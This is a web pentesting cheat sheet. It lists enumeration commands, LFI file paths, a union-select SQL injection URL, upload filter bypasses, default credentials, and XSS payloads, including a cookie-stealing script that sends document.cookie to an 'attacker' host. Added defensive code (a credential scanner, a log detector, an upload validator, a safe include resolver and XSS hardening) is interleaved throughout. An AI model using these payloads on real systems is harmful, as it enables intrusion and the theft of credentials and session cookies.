Web enumeration

Good directory discovery tool:

$ git clone https://github.com/maurosoria/dirsearch.git; cd dirsearch; python3 dirsearch.py -u http://$ip/ -e php

Directory discovery

$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://$ip

Nmap HTTP form fuzzer

$ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip

Nmap: check the server methods

$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Test OPTIONS against every folder/file.

Test every GET/POST parameter for SQLi and RCE.

Find hardcoded credentials

JBoss

JMX console: http://$ip:8080/jmx-console/
WAR file deployment

Joomla

configuration.php
diagnostics.php
joomla.inc.php
config.inc.php

Mambo

configuration.php
config.inc.php

Wordpress

setup-config.php
wp-config.php
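The config files listed for JBoss, Joomla, Mambo and WordPress are where hardcoded database credentials usually live, which is why the "find hardcoded credentials" step above pays off. The defender's version of that step is to find them first: the scanner below is an added example (not code from this page or from any of the CMS projects) that walks a PHP tree and reports literal credential assignments. The regexes, the file names in CONFIG_NAMES, and the sample file contents are constructed for the demo, not taken from real installations.

```python
import re
import tempfile
from pathlib import Path

# Patterns for credential-looking assignments in PHP configuration files.
# Each rule captures the key name and the literal value assigned to it.
CREDENTIAL_RULES = [
    # define('DB_PASSWORD', 'x');  (WordPress wp-config.php style)
    ("php_define", re.compile(
        r"define\(\s*['\"](?P<key>\w*(PASS|PASSWORD|SECRET|KEY|TOKEN)\w*)['\"]"
        r"\s*,\s*['\"](?P<val>[^'\"]*)['\"]", re.I)),
    # $password = 'x';  or  $cfg['Servers'][1]['password'] = 'x';  (Joomla/Mambo/phpMyAdmin style)
    ("php_assign", re.compile(
        r"(?P<key>\$[\w\[\]'\"]*(pass|password|secret|token)[\w\[\]'\"]*)"
        r"\s*=\s*['\"](?P<val>[^'\"]*)['\"]", re.I)),
]

# Config names from the lists above; findings in these files get flagged as known config.
CONFIG_NAMES = {"wp-config.php", "setup-config.php", "configuration.php",
                "config.inc.php", "joomla.inc.php", "diagnostics.php"}


def scan_text(text):
    """Return one finding per line that assigns a string literal to a credential-looking key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in CREDENTIAL_RULES:
            m = rx.search(line)
            if m:
                findings.append({"rule": rule, "line": lineno, "key": m.group("key"),
                                 "empty": m.group("val") == ""})  # empty password is a finding too
                break
    return findings


def scan_tree(root):
    """Scan every .php file under root (credentials leak into ordinary code as well as
    config files) and mark whether each file is one of the well-known CMS config names."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        results[path.name] = {"known_config": path.name in CONFIG_NAMES,
                              "findings": scan_text(path.read_text(errors="replace"))}
    return results


# Constructed sample files mimicking the CMS config layouts (not real projects' content).
SAMPLE_FILES = {
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\ndefine('DB_USER', 'wpuser');\n"
                     "define('DB_PASSWORD', 'Summer2023!');\n",
    "configuration.php": "<?php\nclass JConfig {\n  public $user = 'joomla';\n"
                         "  public $password = 'hunter2';\n}\n",
    "config.inc.php": "<?php\n$cfg['Servers'][1]['password'] = '';\n"
                      "$cfg['Servers'][1]['auth_type'] = 'cookie';\n",
    "index.php": "<?php\necho 'hello';\n",
}


def demo():
    """Write the constructed samples to a temporary directory and scan them."""
    root = Path(tempfile.mkdtemp())
    for name, text in SAMPLE_FILES.items():
        (root / name).write_text(text)
    return scan_tree(root)


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Run it against a web root to get a per-file list of credential lines; anything reported in a file under the document root should be moved out of it or, at minimum, the file should be protected from direct download.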

Authentication

RFI/LFI

Test it:

$ fimap -u "http://$ip/example.php?test="

Automated scanning

Panoptic: https://github.com/lightos/Panoptic/

Interesting payloads:

/etc/passwd | /etc/shadow # instant win
/var/www/html/config.php # or similar paths to get SQL etc. creds
?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini # to find out the Windows version
php://input
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmesg
/var/mail/root
/var/spool/cron/crontabs/root
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/httpd/logs/access.log
/apache/logs/access.log
logs/access.log
/var/log/access_log
/var/log/httpd/access_log
/var/log/httpd-error.log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/www/html/index.php
/var/www/index.php
/var/www/manual/index.html
...

Drupal

$ droopescan scan -u $ip

Wordpress

Scan for known bugs:

$ wpscan http://$ip

Try exploit:

/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
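Everything in this section leaves a distinctive trace in the web server's access log: the directory discovery tools from the top of the page produce bursts of 404s from one client, and the LFI payload list and the union-select request above carry strings that never occur in normal traffic. The detector below is an added example (not from this page or any of the tools it mentions) that parses combined-format log lines, flags the payload families from the list, and flags any client whose 404 count reaches a threshold. The client addresses, the 20-request threshold, the user-agent strings and the log lines themselves are constructed sample data.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Indicator families taken from the payload list above, matched against the URL-decoded request.
PAYLOAD_RULES = {
    "traversal":      re.compile(r"\.\.[/\\]"),
    "php_wrapper":    re.compile(r"php://(filter|input)", re.I),
    "sensitive_file": re.compile(r"/(etc/(passwd|shadow|issue)|proc/self/|var/log/|boot\.ini)", re.I),
    "sqli_union":     re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
}


def parse_line(line):
    """Return the fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Decode twice so a double-encoded "%252e%252e/" is seen as "../".
    entry["decoded"] = unquote(unquote(entry["path"]))
    return entry


def classify(entry):
    """Names of the payload families present in one request."""
    return [name for name, rx in PAYLOAD_RULES.items() if rx.search(entry["decoded"])]


def analyse(lines, notfound_threshold=20):
    """Return (ip, tag, detail) alerts: one per payload hit, plus one per client whose
    404 count reaches the threshold (the signature of wordlist-driven directory discovery)."""
    alerts = []
    notfound = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            alerts.append((entry["ip"], tag, entry["path"]))
        if entry["status"] == 404:
            notfound[entry["ip"]] += 1
    for ip, count in notfound.items():
        if count >= notfound_threshold:
            alerts.append((ip, "dir_bruteforce", f"{count} responses with status 404"))
    return alerts


def _line(ip, path, status, ua="Mozilla/5.0"):
    """Build a constructed combined-format log line (sample data, not a real capture)."""
    return (f'{ip} - - [10/Oct/2023:13:55:36 +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


# Constructed sample traffic: one normal client, one client sending this page's
# LFI and SQLi payloads, one client walking a directory wordlist.
SAMPLE_LINES = [
    _line("10.0.0.5", "/index.php", 200),
    _line("10.0.0.9", "/index.php?page=../../../../etc/passwd", 200, "curl/7.88"),
    _line("10.0.0.9", "/index.php?page=php://filter/convert.base64-encode/resource=config.php",
          200, "curl/7.88"),
    _line("10.0.0.9", "/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select"
          "+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23", 200, "curl/7.88"),
] + [_line("10.0.0.7", f"/dir{i}", 404, "gobuster/3.1") for i in range(25)]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LINES):
        print(alert)
```

Feed it a real access log with `analyse(open(path))`; the 404 threshold is the knob to tune per site, since a broken link on a busy page also produces 404 bursts, whereas the payload rules have almost no benign hits.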

Bruteforcing

Good password list

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt

File uploads

Avoid extension checks using tricks like:

.php5.jpeg
.php5%00.jpeg

Different file formats

https://en.wikipedia.org/wiki/List_of_file_signatures
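The two tricks above (a double extension and an encoded null byte) both defeat a check that only looks at the last extension of the client-supplied name. The validator below is an added example (not code from this page) of the checks that close them: reject null bytes in either form, inspect every extension segment, verify the content against the magic numbers from the file-signature list linked above, and store the file under a server-generated name. The allowed-type table, the error strings and the sample byte strings are constructed for the demo.

```python
import os
import secrets

# Allowed upload types: extension -> accepted leading bytes ("magic numbers"),
# taken from the file-signature list linked above.
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}


def check_upload(filename, data):
    """Return (stored_name, None) if the upload is acceptable, else (None, reason)."""
    # Null bytes: "shell.php5%00.jpeg" relies on a lower layer truncating the name at
    # the NUL; reject both the decoded and the still-encoded form.
    if "\x00" in filename or "%00" in filename.lower():
        return None, "null byte in filename"
    # Strip any directory part the client may have sent (C:\... or ../).
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return None, "missing or hidden extension"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return None, f"extension {ext!r} not allowed"
    # Double extensions: "shell.php5.jpeg" passes a last-extension check, but some
    # servers pick the handler from an inner segment. Accept only inner segments
    # that are themselves allowed image extensions.
    for inner in parts[1:-1]:
        if inner not in ALLOWED_TYPES:
            return None, f"inner extension {inner!r} not allowed"
    # Content check: the bytes must carry the signature of the claimed type.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return None, "content does not match extension"
    # Store under a server-generated name so nothing from the client name survives.
    return f"{secrets.token_hex(8)}.{ext}", None


# Constructed sample payloads: a minimal JPEG header and a PHP stub.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"JFIF"
PHP_BYTES = b"<?php echo 'constructed sample'; ?>"

if __name__ == "__main__":
    for name in ("holiday.jpeg", "shell.php5.jpeg", "shell.php5%00.jpeg", "pic.jpeg"):
        print(name, check_upload(name, JPEG_BYTES if name != "pic.jpeg" else PHP_BYTES))
```

Because the stored name is generated server-side, the client name never reaches the filesystem; the extension checks exist only so the upload is refused early with a clear reason rather than silently renamed.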

PHP

You can usually bypass file include filters with payloads like:

php://filter/convert.base64-encode/resource=file

If you control an include statement such as

include("lang/".$_COOKIE['lang']);

You can set a cookie pointing to an arbitrary PHP file and have it executed in your page.
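What makes the include above exploitable is that the cookie value contributes path characters (and, in PHP, a stream wrapper such as php://filter) to the file name. The following added example (written in Python for illustration, not code from this page) contrasts a resolver that mirrors the vulnerable concatenation with one that treats the cookie as a selector into an allowlist built from the files that actually exist in lang/. The token grammar, the directory layout produced by make_demo_tree() and the error strings are assumptions made for the demo.

```python
import re
import tempfile
from pathlib import Path


class IncludeRejected(ValueError):
    pass


# A scheme prefix such as php://, data:, http:// (stream wrappers are never file names).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)
# The only shape a language selector may have: letters with an optional region suffix.
TOKEN_RE = re.compile(r"^[a-z]{2,8}(_[a-z]{2,8})?$", re.I)


def vulnerable_resolve(base_dir, lang):
    """Mirrors include("lang/".$_COOKIE['lang']): the cookie value is glued onto the path,
    so "../" walks out of lang/ and an absolute value replaces the prefix entirely."""
    return (Path(base_dir) / "lang" / lang).resolve()


def safe_resolve(base_dir, lang):
    """Map a language selector to a file inside lang/, or raise IncludeRejected."""
    if "\x00" in lang or SCHEME_RE.match(lang):
        raise IncludeRejected("wrapper or null byte")
    if not TOKEN_RE.match(lang):
        raise IncludeRejected("not a language token")
    lang_dir = (Path(base_dir) / "lang").resolve()
    # The allowlist is the set of files that actually exist; the selector picks one of
    # them and never contributes path characters of its own.
    allowed = {p.stem: p.resolve() for p in lang_dir.glob("*.php")}
    if lang not in allowed:
        raise IncludeRejected("unknown language")
    candidate = allowed[lang]
    if lang_dir not in candidate.parents:  # still confined even if lang/ holds a symlink
        raise IncludeRejected("escaped lang directory")
    return candidate


def is_accepted(base_dir, lang):
    """Convenience wrapper: True if safe_resolve would include a file for this value."""
    try:
        safe_resolve(base_dir, lang)
        return True
    except IncludeRejected:
        return False


def make_demo_tree():
    """Constructed layout: <tmp>/lang/{en,de}.php plus a file outside lang/."""
    base = Path(tempfile.mkdtemp())
    (base / "lang").mkdir()
    (base / "lang" / "en.php").write_text("<?php $strings = ['hello' => 'Hello']; ?>\n")
    (base / "lang" / "de.php").write_text("<?php $strings = ['hello' => 'Hallo']; ?>\n")
    (base / "secret.txt").write_text("not meant to be included\n")
    return base


if __name__ == "__main__":
    base = make_demo_tree()
    print("vulnerable:", vulnerable_resolve(base, "../secret.txt"))
    print("safe:", safe_resolve(base, "en"))
    print("rejected:", is_accepted(base, "php://filter/convert.base64-encode/resource=../config.php"))
```

The same shape applies in PHP: validate the cookie against a fixed token pattern, look it up in an array of known languages, and only then build the include path from the matched entry.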

SSL certificates

Find out the potentially correct vhost to request.

Is the clock skewed?

Any names that could be usernames for bruteforce/guessing.

Login

Always try the users root, admin and administrator with the passwords letmein, admin and root.

Files

Run strings against every file

XSS vectors

Invisible iframe:

<iframe src="http://attacker/" height="0" width="0"></iframe>

Steal cookies

<script> new Image().src="http://attacker/bogus.php?output="+document.cookie; </script>
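Both vectors above work only when user input reaches the page as raw markup and when the session cookie is readable from script. The following added example (not code from this page) shows the two server-side controls that neutralise them: contextual HTML escaping in the template, and a session cookie set with HttpOnly so document.cookie has nothing to hand to the Image() beacon, backed by a CSP that refuses third-party image loads and framing. The template shape, header values and cookie-value grammar are assumptions made for the demo.

```python
import html
import re


def escape_for_html(value):
    """Escape untrusted text for use in an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)


def render_comment(author, body):
    """Template that escapes every untrusted value, so the iframe and script vectors
    above are rendered as visible text instead of being interpreted as markup."""
    return (f'<div class="comment" data-author="{escape_for_html(author)}">'
            f'<p>{escape_for_html(body)}</p></div>')


def session_cookie_header(name, value):
    """Set-Cookie value for a session cookie. HttpOnly keeps it out of document.cookie,
    so the cookie-stealing payload above has nothing to send even if a script runs."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+", value):
        raise ValueError("cookie value must be a plain token")
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def security_headers():
    """Response headers that limit the damage of an injection that slips past escaping:
    no third-party images (the Image() beacon), no inline scripts, no framing."""
    return {
        "Content-Security-Policy": "default-src 'self'; img-src 'self'; script-src 'self'; frame-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


# The two vectors from this section, used as constructed input to the template.
XSS_SAMPLES = [
    '<iframe src="http://attacker/" height="0" width="0"></iframe>',
    '<script> new Image().src="http://attacker/bogus.php?output="+document.cookie; </script>',
]


def is_neutralised(rendered):
    """True when no raw tag from the samples survived rendering."""
    return "<iframe" not in rendered and "<script" not in rendered


if __name__ == "__main__":
    print(render_comment(XSS_SAMPLES[0], XSS_SAMPLES[1]))
    print(session_cookie_header("session", "constructed-token"))
```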